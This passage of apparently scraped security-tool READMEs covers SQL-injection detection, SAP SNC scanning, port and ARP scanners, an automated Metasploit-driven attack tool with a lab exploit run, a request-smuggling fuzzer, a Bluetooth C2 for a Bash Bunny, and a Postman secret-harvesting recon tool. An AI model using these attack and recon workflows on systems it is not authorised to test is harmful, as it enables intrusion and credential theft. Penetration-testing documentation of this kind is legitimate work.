Threads can be defined with --threads flag
./sqlisniper.py -r url.txt --threads 10
Note: It is crucial to consider that employing a higher number of threads might lead to potential false positives or overlooking valid issues. Due to the nature of time-based SQL injection it is recommended to use lower thread for more accurate detection.
SqliSniper
is made inΒ pythonΒ with lots of <3 by @Muhammad Danial.
Tool for analyzing SAP Secure Network Communications (SNC).
In its current state, sncscan
can be used to read the SNC configurations for SAP Router and DIAG (SAP GUI) connections. The implementation for the SAP RFC protocol is currently in development.
SAP Routers can either support SNC or not, a more granular configuration of the SNC parameters is not possible. Nevertheless, sncscan
find out if it is activated:
sncscan -H 10.3.161.4 -S 3299 -p router
The SNC configuration of a DIAG connection used by a SAP GUI can have more versatile settings than the router configuration. A detailled overview of the system parameterss that can be read with sncscan
and impact the connections security is in the section Background
sncscan -H 10.3.161.3 -S 3200 -p diag
Multiple targets can be scanned with one command:
sncscan -L /H/192.168.56.101/S/3200,/H/192.168.56.102/S/3206
sncscan --route-string /H/10.3.161.5/S/3299/H/10.3.161.3/S/3200 -p diag
Requirements: Currently the sncscan only works with the pysap libary from our fork.
python3 -m pip install -r requirements.txt
or
python3 setup.py test
python3 setup.py install
SAP protocols, such as DIAG or RFC, do not provide high security themselves. To increase security and ensure Authentication, Integrity and Encryption, the use of SNC (Secure Network Communications) is required. SNC protects the data communication paths between various client and server components of the SAP system that use the RFC, DIAG or router protocol by applying known cryptographic algorithms to the data in order to increase its security. There are three different levels of data protection, that can be applied for an SNC secured connection:
Each SAP system can be configured with SNC parameters for the communication security. The level of the SNC connection is determined by the Quality of Protection parameters:
Additional SNC parameters can be used for further system-specific configuration options, including the snc/only_encrypted_gui parameter, which ensures that encrypted SAPGUI connections are enforced.
As long as a SAP System is addressed that is capable of sending SNC messages, it also responds to valid SNC requests, regardless of which IP, port, and CN were specified for SNC. This response contains the requirements that the SAP system has for the SNC connection, which can then be used to obtain the SNC parameters. This can be used to find out whether an SAP system has SNC enabled and, if so, which SNC parameters have been set.
To know more about our Attack Surface
Management platform, check out NVADR.
Bugsy is a command-line interface (CLI) tool that provides automatic security vulnerability remediation for your code. It is the community edition version of Mobb, the first vendor-agnostic automated security vulnerability remediation tool. Bugsy is designed to help developers quickly identify and fix security vulnerabilities in their code.
Mobb is the first vendor-agnostic automatic security vulnerability remediation tool. It ingests SAST results from Checkmarx, CodeQL (GitHub Advanced Security), OpenText Fortify, and Snyk and produces code fixes for developers to review and commit to their code.
Bugsy has two modes - Scan (no SAST report needed) & Analyze (the user needs to provide a pre-generated SAST report from one of the supported SAST tools).
Scan
Analyze
This is a community edition version that only analyzes public GitHub repositories. Analyzing private repositories is allowed for a limited amount of time. Bugsy does not detect any vulnerabilities in your code, it uses findings detected by the SAST tools mentioned above.
You can simply run Bugsy from the command line, using npx:
CATSploit is an automated penetration testing tool using Cyber Attack Techniques Scoring (CATS) method that can be used without pentester. Currently, pentesters implicitly made the selection of suitable attack techniques for target systems to be attacked. CATSploit uses system configuration information such as OS, open ports, software version collected by scanner and calculates a score value for capture eVc and detectability eVd of each attack techniques for target system. By selecting the highest score values, it is possible to select the most appropriate attack technique for the target system without hack knack(professional pentesterβs skill) .
CATSploit automatically performs penetration tests in the following sequence:
Information gathering and prior information input First, gathering information of target systems. CATSploit supports nmap and OpenVAS to gather information of target systems. CATSploit also supports prior information of target systems if you have.
Calculating score value of attack techniques Using information obtained in the previous phase and attack techniques database, evaluation values of capture (eVc) and detectability (eVd) of each attack techniques are calculated. For each target computer, the values of each attack technique are calculated.
Selection of attack techniques by using scores and make attack scenario Select attack techniques and create attack scenarios according to pre-defined policies. For example, for a policy that prioritized hard-to-detect, the attack techniques with the lowest eVd(Detectable Score) will be selected.
Execution of attack scenario CATSploit executes the attack techniques according to attack scenario constructed in the previous phase. CATSploit uses Metasploit as a framework and Metasploit API to execute actual attacks.
CATSploit has the following prerequisites:
For Metasploit, Nmap and OpenVAS, it is assumed to be installed with the Kali Distribution.
To install the latest version of CATSploit, please use the following commands:
$ git clone https://github.com/catsploit/catsploit.git
$ cd catsploit
$ git clone https://github.com/catsploit/cats-helper.git
$ sudo ./setup.sh
CATSploit is a server-client configuration, and the server reads the configuration JSON file at startup. In config.json
, the following fields should be modified for your environment.
(*) Adjust the number according to the specs of your machine.
To start the server, execute the following command:
$ python cats_server.py -c [CONFIG_FILE]
Next, prepare another console, start the client program, and initiate a connection to the server.
$ python catsploit.py -s [SOCKET_PATH]
After successfully connecting to the server and initializing it, the session will start.
_________ ___________ __ _ __
/ ____/ |/_ __/ ___/____ / /___ (_) /_
/ / / /| | / / \__ \/ __ \/ / __ \/ / __/
/ /___/ ___ |/ / ___/ / /_/ / / /_/ / / /_
\____/_/ |_/_/ /____/ .___/_/\____/_/\__/
/_/
[*] Connecting to cats-server
[*] Done.
[*] Initializing server
[*] Done.
catsploit>
The client can execute a variety of commands. Each command can be executed with -h
option to display the format of its arguments.
usage: [-h] {host,scenario,scan,plan,attack,post,reset,help,exit} ...
positional arguments:
{host,scenario,scan,plan,attack,post,reset,help,exit}
options:
-h, --help show this help message and exit
I've posted the commands and options below as well for reference.
host list:
show information about the hosts
usage: host list [-h]
options:
-h, --help show this help message and exit
host detail:
show more information about one host
usage: host detail [-h] host_id
positional arguments:
host_id ID of the host for which you want to show information
options:
-h, --help show this help message and exit
scenario list:
show information about the scenarios
usage: scenario list [-h]
options:
-h, --help show this help message and exit
scenario detail:
show more information about one scenario
usage: scenario detail [-h] scenario_id
positional arguments:
scenario_id ID of the scenario for which you want to show information
options:
-h, --help show this help message and exit
scan:
run network-scan and security-scan
usage: scan [-h] [--port PORT] targe t_host [target_host ...]
positional arguments:
target_host IP address to be scanned
options:
-h, --help show this help message and exit
--port PORT ports to be scanned
plan:
planning attack scenarios
usage: plan [-h] src_host_id dst_host_id
positional arguments:
src_host_id originating host
dst_host_id target host
options:
-h, --help show this help message and exit
attack:
execute attack scenario
usage: attack [-h] scenario_id
positional arguments:
scenario_id ID of the scenario you want to execute
options:
-h, --help show this help message and exit
post find-secret:
find confidential information files that can be performed on the pwned host
usage: post find-secret [-h] host_id
positional arguments:
host_id ID of the host for which you want to find confidential information
op tions:
-h, --help show this help message and exit
reset:
reset data on the server
usage: reset [-h] {system} ...
positional arguments:
{system} reset system
options:
-h, --help show this help message and exit
exit:
exit CATSploit
usage: exit [-h]
options:
-h, --help show this help message and exit
In this example, we use CATSploit to scan network, plan the attack scenario, and execute the attack.
catsploit> scan 192.168.0.0/24
Network Scanning ... 100%
[*] Total 2 hosts were discovered.
Vulnerability Scanning ... 100%
[*] Total 14 vulnerabilities were discovered.
catsploit> host list
ββββββββββββ³βββββββββββββββββ³βββββββββββ³βββββββββββββββββββββββββββββββββββ³ββββββββ
β hostID β IP β Hostname β Platform β Pwned β
β‘ββββββ βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β attacker β 0.0.0.0 β kali β kali 2022.4 β True β
β h_exbiy6 β 192.168.0.10 β β Linux 3.10 - 4.11 β False β
β h_nhqyfq β 192.168.0.20 β β Microsoft Windows 7 SP1 β False β
ββββββββββββ΄ ββββββββββββββββ΄βββββββββββ΄βββββββββββββββββββββββββββββββββββ΄ββββββββ
catsploit> host detail h_exbiy6
ββββββββββββ³βββββββββββββββ³βββββββββββ³βββββββββββββββ³ββββββββ
β hostID β IP β Hostname β Platform β Pwned β
β‘ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β h_exbiy6 β 192.168.0.10 β ubuntu β ubuntu 14.04 β False β
ββββββββββββ΄βββββββββββββββ΄βββββββββββ΄βββββββββββββββ΄β ββββββ
[IP address]
ββββββββββββββββ³βββββββββββ³βββββββ³βββββββββββββ
β ipv4 β ipv4mask β ipv6 β ipv6prefix β
β‘ββββββββββββββββββββββββββββββββββββββββββββββ©
β 192.168.0.10 β β β β
βββββββββββββ ββ΄βββββββββββ΄βββββββ΄βββββββββββββ
[Open ports]
ββββββββββββββββ³ββββββββ³βββββββ³ββββββββββββββ³βββββββββββββββ³βββββββββββββββββββββββββββββ
β ip β proto β port β service β product β version β
β‘ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β 192.168.0.10 β tcp β 21 β ftp β ProFTPD β 1.3.5 β
β 192.168.0.10 β tcp β 22 β ssh β OpenSSH β 6.6.1p1 Ubuntu 2ubuntu2.10 β
β 192.168.0.10 β tcp β 80 β http β Apache httpd β 2.4.7 β
β 192.168.0.10 β tcp β 445 β netbios-ssn β Samba smbd β 3.X - 4.X β
β 192.168.0.10 β tcp β 631 β ipp β CUPS β 1.7 β
ββββββββββββββββ΄ββββββββ΄βββββββ΄ββββββββββββββ΄βββββββββββββββ΄βββββββββββββββββββββββββββββ
[Vulnerabilities]
ββββββββββββββββ³ββββββββ³βββββββ³ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ³βββββββββββββββββ
β ip β proto β port β vuln_name β cve β
β‘βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β 192.168.0.10 β tcp β 0 β TCP Timestamps Information Disclosure β N/A β
β 192.168.0.10 β tcp β 21 β FTP Unencrypted Cleartext Login β N/A β
β 192.168.0.10 β tcp β 22 β Weak MAC Algorithm(s) Supported (SSH) β N/A β
β 192.168.0.10 β tcp β 22 β Weak Encryption Algorithm(s) Supported (SSH) β N/A β
β 192.168.0.10 β tcp β 22 β Weak Host Key Algorithm(s) (SSH) β N/A β
β 192.168.0.10 β tcp β 22 β Weak Key Exchange (KEX) Algorithm(s) Supported (SSH) β N/A β
β 192.168.0.10 β tcp β 80 β Test HTTP dangerous methods β N/A β
β 192.168.0.10 β tcp β 80 β Drupal Core SQLi Vulnerability (SA-CORE-2014-005) - Active Check β CVE-2014-3704 β
β 192.168.0.10 β tcp β 80 β Drupal Coder RCE Vulnerability (SA-CONTRIB-2016-039) - Active Check β N/A β
β 192.168.0.10 β tcp β 80 β Sensitive File Disclosure (HTTP) β N/A β
β 192.168.0.10 β tcp β 80 β Unprotected Web App / Device Installers (HTTP) β N/A β
β 192.168.0.10 β tcp β 80 β Cleartext Transmission of Sensitive Information via HTTP β N/A β
β 192.168.0.10 β tcp β 80 β jQuery < 1.9.0 XSS Vulnerability β CVE-2012-6708 β
β 192.168.0.10 β tcp β 80 β jQuery < 1.6.3 XSS Vulnerability β CVE-2011-4969 β
β 192.168.0.10 β tcp β 80 β Drupal 7.0 Information Disclosure Vulnerability - Active Check β CVE-2011-3730 β
β 192.168.0.10 β tcp β 631 β SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β CVE-2016-2183 β
β 192.168.0.10 β tcp β 631 β SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β CVE-2016-6329 β
β 192.168.0.10 β tcp β 631 β SSL/TLS: Report Vulnerable Cipher Suites for HTTPS β CVE-2020-12872 β
β 192.168.0.10 β tcp β 631 β SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection β CVE-2011-3389 β
β 192.168.0.10 β tcp β 631 β SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection β CVE-2015-0204 β
ββββββββββββββββ΄ββββββββ΄βββββββ΄ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ΄βββ& #9472;βββββββββββββ
[Users]
βββββββββββββ³ββββββββ
β user name β group β
β‘ββββββββββββββββββββ©
βββββββββββββ΄ββββββββ
catsploit> plan attacker h_exbiy6
Planning attack scenario...100%
[*] Done. 15 scenarios was planned.
[*] To check each scenario, try 'scenario list' and/or 'scenario detail'.
catsploit> scenario list
βββββββββββββββ³βββββ ββββββββ³βββββββββββββββββ³ββββββββ³ββββββββ³ββββββββ³ββββββββββββββββββββββββββββββββ
β scenario id β src host ip β target host ip β eVc β eVd β steps β first attack step β
β‘ββββββββββββββββββββββββββββββββββββγ 3;ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β 3d3ivc β 0.0.0.0 β 192.168.0.10 β 1.0 β 32.0 β 1 β exploit/multi/http/jenkins_sβ¦ β
β 5gnsvh β 0.0.0.0 β 192.168.0.10 β 1.0 β 53.76 β 2 β exploit/multi/http/jenkins_sβ¦ β
β 6nlxyc β 0.0.0.0 β 192.168.0.10 β 0.0 β 48.32 β 2 β exploit/multi/http/jenkins_sβ¦ β
β 8jos4z β 0.0.0.0 β 192.168.0.1 0 β 0.7 β 72.8 β 2 β exploit/multi/http/jenkins_sβ¦ β
β 8kmmts β 0.0.0.0 β 192.168.0.10 β 0.0 β 32.0 β 1 β exploit/multi/elasticsearch/β¦ β
β agjmma β 0.0.0.0 β 192.168.0.10 β 0.0 β 24.0 β 1 β exploit/windows/http/manageeβ¦ β
β joglhf β 0.0.0.0 β 192.168.0.10 β 70.0 β 60.0 β 1 β auxiliary/scanner/ssh/ssh_loβ¦ β
β rmgrof β 0.0.0.0 β 192.168.0.10 β 100.0 β 32.0 β 1 β exploit/multi/http/drupal_drβ¦ β
β xuowzk β 0.0.0.0 β 192.168.0.10 β 0.0 β 24.0 β 1 β exploit/multi/http/struts_dmβ¦ β
β yttv51 β 0.0.0.0 β 192.168.0.10 β 0.01 β 53.76 β 2 β exploit/multi/http/jenkins_sβ¦ β
β znv76x β 0.0.0.0 β 192.168.0.10 β 0.01 β 53.76 β 2 β exploit/multi/http/jenkins_sβ¦ β
βββββββββββββββ΄ββββββββββββββ΄βββββββββββββββββ΄ββββββββ΄ββββββββ΄ββββββββ΄ββββββββββββββββββββββββββββββββ
catsploit> scenario detail rmgrof
βββββββββββββββ³βββββββββββββββββ³ββββββββ³βββββββ
β src host ip β target host ip β eVc β eVd β
β‘ββββββββββββββββββββββββββββββββββββββββββββββ©
β 0.0.0.0 β 192.168.0.10 β 100.0 β 32.0 β
βββββββββββββββ΄ββββββββ ββββββββ΄ββββββββ΄βββββββ
[Steps]
βββββ³ββββββββββββββββββββββββββββββββββββββββ³ββββββββββββββββββββββββ
β # β step β params β
β‘βββββββββββββββββββββββββββββββ ββββββββββββββββββββββββββββββββββββ©
β 1 β exploit/multi/http/drupal_drupageddon β RHOSTS: 192.168.0.10 β
β β β LHOST: 192.168.10.100 β
βββββ΄ββββββββββββββββββββββββββββββββββββββββ΄ββββββββββββββββββββββββ
catsploit> attack rmgrof
> ~> ~
> Metasploit Console Log
> ~
> ~
[+] Attack scenario succeeded!
catsploit> exit
Bye.
All informations and codes are provided solely for educational purposes and/or testing your own systems.
For any inquiry, please contact the email address as follows:
catsploit@nk.MitsubishiElectric.co.jp
A project for fuzzing HTTP/1.1 CL.0 Request Smuggling Attack Vectors.
Thank you to @albinowax, @defparam and @d3d else this tool would not exist. Inspired by the tool Smuggler all attack gadgets adapted from Smuggler and https://portswigger.net/research/how-to-turn-security-research-into-profit
For more info see: https://moopinger.github.io/blog/fuzzing/clzero/tools/request/smuggling/2023/11/15/Fuzzing-With-CLZero.html
usage: clzero.py [-h] [-url URL] [-file FILE] [-index INDEX] [-verbose] [-no-color] [-resume] [-skipread] [-quiet] [-lb] [-config CONFIG] [-method METHOD]
CLZero by Moopinger
optional arguments:
-h, --help show this help message and exit
-url URL (-u), Single target URL.
-file FILE (-f), Files containing multiple targets.
-index INDEX (-i), Index start point when using a file list. Default is first line.
-verbose (-v), Enable verbose output.
-no-color Disable colors in HTTP Status
-resume Resume scan from last index place.
-skipread Skip the read response on smuggle requests, recommended. This will save a lot of time between requests. Ideal for targets with standard HTTP traffic.
-quiet (-q), Disable output. Only successful payloads will be written to ./payloads/
-lb Last byte sync method for least request latency. Due to th e nature of the request, it cannot guarantee that the smuggle request will be processed first. Ideal for targets with a high
amount of traffic, and you do not mind sending multiple requests.
-config CONFIG (-c) Config file to load, see ./configs/ to create custom payloads
-method METHOD (-m) Method to use when sending the smuggle request. Default: POST
single target attack:
python3 clzero.py -u https://www.target.com/ -c configs/default.py -skipread
python3 clzero.py -u https://www.target.com/ -c configs/default.py -lb
Multi target attack:
python3 clzero.py -l urls.txt -c configs/default.py -skipread
python3 clzero.py -l urls.txt -c configs/default.py -lb
git clone https://github.com/Moopinger/CLZero.git
cd CLZero
pip3 install -r requirements.txt
NetworkSherlock is a powerful and flexible port scanning tool designed for network security professionals and penetration testers. With its advanced capabilities, NetworkSherlock can efficiently scan IP ranges, CIDR blocks, and multiple targets. It stands out with its detailed banner grabbing capabilities across various protocols and integration with Shodan, the world's premier service for scanning and analyzing internet-connected devices. This Shodan integration enables NetworkSherlock to provide enhanced scanning capabilities, giving users deeper insights into network vulnerabilities and potential threats. By combining local port scanning with Shodan's extensive database, NetworkSherlock offers a comprehensive tool for identifying and analyzing network security issues.
NetworkSherlock requires Python 3.6 or later.
git clone https://github.com/HalilDeniz/NetworkSherlock.git
pip install -r requirements.txt
Update the networksherlock.cfg
file with your Shodan API key:
[SHODAN]
api_key = YOUR_SHODAN_API_KEY
python3 networksherlock.py --help
usage: networksherlock.py [-h] [-p PORTS] [-t THREADS] [-P {tcp,udp}] [-V] [-s SAVE_RESULTS] [-c] target
NetworkSherlock: Port Scan Tool
positional arguments:
target Target IP address(es), range, or CIDR (e.g., 192.168.1.1, 192.168.1.1-192.168.1.5,
192.168.1.0/24)
options:
-h, --help show this help message and exit
-p PORTS, --ports PORTS
Ports to scan (e.g. 1-1024, 21,22,80, or 80)
-t THREADS, --threads THREADS
Number of threads to use
-P {tcp,udp}, --protocol {tcp,udp}
Protocol to use for scanning
-V, --version-info Used to get version information
-s SAVE_RESULTS, --save-results SAVE_RESULTS
File to save scan results
-c, --ping-check Perform ping check before scanning
--use-shodan Enable Shodan integration for additional information
target
: The target IP address(es), IP range, or CIDR block to scan.-p
, --ports
: Ports to scan (e.g., 1-1000, 22,80,443).-t
, --threads
: Number of threads to use.-P
, --protocol
: Protocol to use for scanning (tcp or udp).-V
, --version-info
: Obtain version information during banner grabbing.-s
, --save-results
: Save results to the specified file.-c
, --ping-check
: Perform a ping check before scanning.--use-shodan
: Enable Shodan integration.Scan a single IP address on default ports:
python networksherlock.py 192.168.1.1
Scan an IP address with a custom range of ports:
python networksherlock.py 192.168.1.1 -p 1-1024
Scan multiple IP addresses on specific ports:
python networksherlock.py 192.168.1.1,192.168.1.2 -p 22,80,443
Scan an entire subnet using CIDR notation:
python networksherlock.py 192.168.1.0/24 -p 80
Perform a scan using multiple threads for faster execution:
python networksherlock.py 192.168.1.1-192.168.1.5 -p 1-1024 -t 20
Scan using a specific protocol (TCP or UDP):
python networksherlock.py 192.168.1.1 -p 53 -P udp
python networksherlock.py 192.168.1.1 --use-shodan
python networksherlock.py 192.168.1.1,192.168.1.2 -p 22,80,443 -V --use-shodan
Perform a detailed scan with banner grabbing and save results to a file:
python networksherlock.py 192.168.1.1 -p 1-1000 -V -s results.txt
Scan an IP range after performing a ping check:
python networksherlock.py 10.0.0.1-10.0.0.255 -c
$ python3 networksherlock.py 10.0.2.12 -t 25 -V -p 21-6000 -t 25
********************************************
Scanning target: 10.0.2.12
Scanning IP : 10.0.2.12
Ports : 21-6000
Threads : 25
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
22 /tcp open ssh SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
21 /tcp open telnet 220 (vsFTPd 2.3.4)
80 /tcp open http HTTP/1.1 200 OK
139 /tcp open netbios-ssn %SMBr
25 /tcp open smtp 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
23 /tcp open smtp #' #'
445 /tcp open microsoft-ds %SMBr
514 /tcp open shell
512 /tcp open exec Where are you?
1524/tcp open ingreslock ro ot@metasploitable:/#
2121/tcp open iprop 220 ProFTPD 1.3.1 Server (Debian) [::ffff:10.0.2.12]
3306/tcp open mysql >
5900/tcp open unknown RFB 003.003
53 /tcp open domain
---------------------------------------------
$ python3 networksherlock.py 10.0.2.0/24 -t 10 -V -p 21-1000
********************************************
Scanning target: 10.0.2.1
Scanning IP : 10.0.2.1
Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
53 /tcp open domain
********************************************
Scanning target: 10.0.2.2
Scanning IP : 10.0.2.2
Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
445 /tcp open microsoft-ds
135 /tcp open epmap
********************************************
Scanning target: 10.0.2.12
Scanning IP : 10.0.2.12
Ports : 21- 1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
21 /tcp open ftp 220 (vsFTPd 2.3.4)
22 /tcp open ssh SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
23 /tcp open telnet #'
80 /tcp open http HTTP/1.1 200 OK
53 /tcp open kpasswd 464/udpcp
445 /tcp open domain %SMBr
3306/tcp open mysql >
********************************************
Scanning target: 10.0.2.20
Scanning IP : 10.0.2.20
Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
22 /tcp open ssh SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9
Contributions are welcome! To contribute to NetworkSherlock, follow these steps:
NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.
You can download the program from the GitHub page.
$ git clone https://github.com/HalilDeniz/NetProbe.git
To install the required libraries, run the following command:
$ pip install -r requirements.txt
To run the program, use the following command:
$ python3 netprobe.py [-h] -t [...] -i [...] [-l] [-o] [-m] [-r] [-s]
-h
,--help
: show this help message and exit-t
,--target
: Target IP address or subnet (default: 192.168.1.0/24)-i
,--interface
: Interface to use (default: None)-l
,--live
: Enable live tracking of devices-o
,--output
: Output file to save the results-m
,--manufacturer
: Filter by manufacturer (e.g., 'Apple')-r
,--ip-range
: Filter by IP range (e.g., '192.168.1.0/24')-s
,--scan-rate
: Scan rate in seconds (default: 5)$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l
$ python3 netprobe.py --help
usage: netprobe.py [-h] -t [...] -i [...] [-l] [-o] [-m] [-r] [-s]
NetProbe: Network Scanner Tool
options:
-h, --help show this help message and exit
-t [ ...], --target [ ...]
Target IP address or subnet (default: 192.168.1.0/24)
-i [ ...], --interface [ ...]
Interface to use (default: None)
-l, --live Enable live tracking of devices
-o , --output Output file to save the results
-m , --manufacturer Filter by manufacturer (e.g., 'Apple')
-r , --ip-range Filter by IP range (e.g., '192.168.1.0/24')
-s , --scan-rate Scan rate in seconds (default: 5)
$ python3 netprobe.py
You can enable live tracking of devices on your network by using the -l
or --live
flag. This will continuously update the device list every 5 seconds.
$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l
You can save the scan results to a file by using the -o
or --output
flag followed by the desired output file name.
$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l -o results.txt
ββββββββββββββββ³ββββββββββββββββββββ³ββββββββββββββ³βββββββββββββββββββββββββββββββ
β IP Address β MAC Address β Packet Size β Manufacturer β
β‘ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β 192.168.1.1 β **:6e:**:97:**:28 β 102 β ASUSTek COMPUTER INC. β
β 192.168.1.3 β 00:**:22:**:12:** β 102 β InPro Comm β
β 192.168.1.2 β **:32:**:bf:**:00 β 102 β Xiaomi Communications Co Ltd β
β 192.168.1.98 β d4:**:64:**:5c:** β 102 β ASUSTek COMPUTER INC. β
β 192.168.1.25 β **:49:**:00:**:38 β 102 β Unknown β
ββββββββββββββββ΄ββββββββββββββββββββ΄ββββββββββββββ΄βββββββββββββββββββββββββββββββ
If you have any questions, suggestions, or feedback about the program, please feel free to reach out to me through any of the following platforms:
This program is released under the MIT LICENSE. See LICENSE for more information.
C2 solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II.
Send your Bash Bunny all the instructions it needs just over the air.
pip install pygatt "pygatt[GATTTOOL]"
Make sure BlueZ is installed and gatttool
is usable
sudo apt install bluez
git clone https://github.com/90N45-d3v/BlueBunny
cd BlueBunny/C2
sudo python c2-server.py
BlueBunny/payload.txt
).localhost:1472
and connect your Bash Bunny (Your Bash Bunny will light up green when it's ready to pair).You can use BlueBunny's BLE backend and communicate with your Bash Bunny manually.
# Import the backend (BlueBunny/C2/BunnyLE.py)
import BunnyLE
# Define the data to send
data = "QUACK STRING I love my Bash Bunny"
# Define the type of the data to send ("cmd" or "payload") (payload data will be temporary written to a file, to execute multiple commands like in a payload script file)
d_type = "cmd"
# Initialize BunnyLE
BunnyLE.init()
# Connect to your Bash Bunny
bb = BunnyLE.connect()
# Send the data and let it execute
BunnyLE.send(bb, data, d_type)
The Bluetooth stack used is well known, but also very buggy. If starting the connection with your Bash Bunny does not work, it is probably a temporary problem due to BlueZ. Here are some kind of errors that can be caused by temporary bugs. These usually disappear at the latest after rebooting the C2's operating system, so don't be surprised and calm down if they show up.
As I said, BlueZ, the base for the bluetooth part used in BlueBunny, is somewhat bug prone. If you encounter any non-temporary bugs when connecting to Bash Bunny as well as any other bugs/difficulties in the whole BlueBunny project, you are always welcome to contact me. Be it a problem, an idea/solution or just a nice feedback.
Porch Pirate started as a tool to quickly uncover Postman secrets, and has slowly begun to evolve into a multi-purpose reconaissance / OSINT framework for Postman. While existing tools are great proof of concepts, they only attempt to identify very specific keywords as "secrets", and in very limited locations, with no consideration to recon beyond secrets. We realized we required capabilities that were "secret-agnostic", and had enough flexibility to capture false-positives that still provided offensive value.
Porch Pirate enumerates and presents sensitive results (global secrets, unique headers, endpoints, query parameters, authorization, etc), from publicly accessible Postman entities, such as:
python3 -m pip install porch-pirate
The Porch Pirate client can be used to nearly fully conduct reviews on public Postman entities in a quick and simple fashion. There are intended workflows and particular keywords to be used that can typically maximize results. These methodologies can be located on our blog: Plundering Postman with Porch Pirate.
Porch Pirate supports the following arguments to be performed on collections, workspaces, or users.
--globals
--collections
--requests
--urls
--dump
--raw
--curl
porch-pirate -s "coca-cola.com"
By default, Porch Pirate will display globals from all active and inactive environments if they are defined in the workspace. Provide a -w
argument with the workspace ID (found by performing a simple search, or automatic search dump) to extract the workspace's globals, along with other information.
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8
When an interesting result has been found with a simple search, we can provide the workspace ID to the -w
argument with the --dump
command to begin extracting information from the workspace and its collections.
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --dump
Porch Pirate can be supplied a simple search term, following the --globals
argument. Porch Pirate will dump all relevant workspaces tied to the results discovered in the simple search, but only if there are globals defined. This is particularly useful for quickly identifying potentially interesting workspaces to dig into further.
porch-pirate -s "shopify" --globals
Porch Pirate can be supplied a simple search term, following the --dump
argument. Porch Pirate will dump all relevant workspaces and collections tied to the results discovered in the simple search. This is particularly useful for quickly sifting through potentially interesting results.
porch-pirate -s "coca-cola.com" --dump
A particularly useful way to use Porch Pirate is to extract all URLs from a workspace and export them to another tool for fuzzing.
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --urls
Porch Pirate will recursively extract all URLs from workspaces and their collections related to a simple search term.
porch-pirate -s "coca-cola.com" --urls
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --collections
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --requests
porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --raw
porch-pirate -w WORKSPACE_ID
porch-pirate -c COLLECTION_ID
porch-pirate -r REQUEST_ID
porch-pirate -u USERNAME/TEAMNAME
Porch Pirate can build curl requests when provided with a request ID for easier testing.
porch-pirate -r 11055256-b1529390-18d2-4dce-812f-ee4d33bffd38 --curl
porch-pirate -s coca-cola.com --proxy 127.0.0.1:8080
p = porchpirate()
print(p.search('coca-cola.com'))
p = porchpirate()
print(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
p = porchpirate()
collections = json.loads(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
for collection in collections['data']:
requests = collection['requests']
for r in requests:
request_data = p.request(r['id'])
print(request_data)
p = porchpirate()
print(p.workspace_globals('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
Other library usage examples can be located in the examples
directory, which contains the following examples:
dump_workspace.py
format_search_results.py
format_workspace_collections.py
format_workspace_globals.py
get_collection.py
get_collections.py
get_profile.py
get_request.py
get_statistics.py
get_team.py
get_user.py
get_workspace.py
recursive_globals_from_search.py
request_to_curl.py
search.py
search_by_page.py
workspace_collections.py
Service that scans your Infrastructure as Code for common vulnerabilities.
Aspect | Information |
---|---|
Tool name | IaC Scan Runner |
Docker image | xscanner/runner |
PyPI package | iac-scan-runner |
Documentation | docs |
Contact us | xopera@xlab.si |
The IaC Scan Runner is a REST API service used to scan IaC (Infrastructure as Code) package and perform various code checks in order to find possible vulnerabilities and improvements. Explore the docs for more info.
This section explains how to run the REST API.
You can run the REST API using a public xscanner/runner Docker image as follows:
# run IaC Scan Runner REST API in a Docker container and
# navigate to localhost:8080/swagger or localhost:8080/redoc
$ docker run --name iac-scan-runner -p 8080:80 xscanner/runner
Or you can build the image locally and run it as follows:
# build Docker container (it will take some time)
$ docker build -t iac-scan-runner .
# run IaC Scan Runner REST API in a Docker container and
# navigate to localhost:8080/swagger or localhost:8080/redoc
$ docker run --name iac-scan-runner -p 8080:80 iac-scan-runner
To run using the IaC Scan Runner CLI:
# install the CLI
$ python3 -m venv .venv && . .venv/bin/activate
(.venv) $ pip install iac-scan-runner
# print OpenAPI specification
(.venv) $ iac-scan-runner openapi
# install prerequisites
(.venv) $ iac-scan-runner install
# run IaC Scan Runner REST API
(.venv) $ iac-scan-runner run
To run locally from source:
# Export env variables
export MONGODB_CONNECTION_STRING=mongodb://localhost:27017
export SCAN_PERSISTENCE=enabled
export USER_MANAGEMENT=enabled
# Setup MongoDB
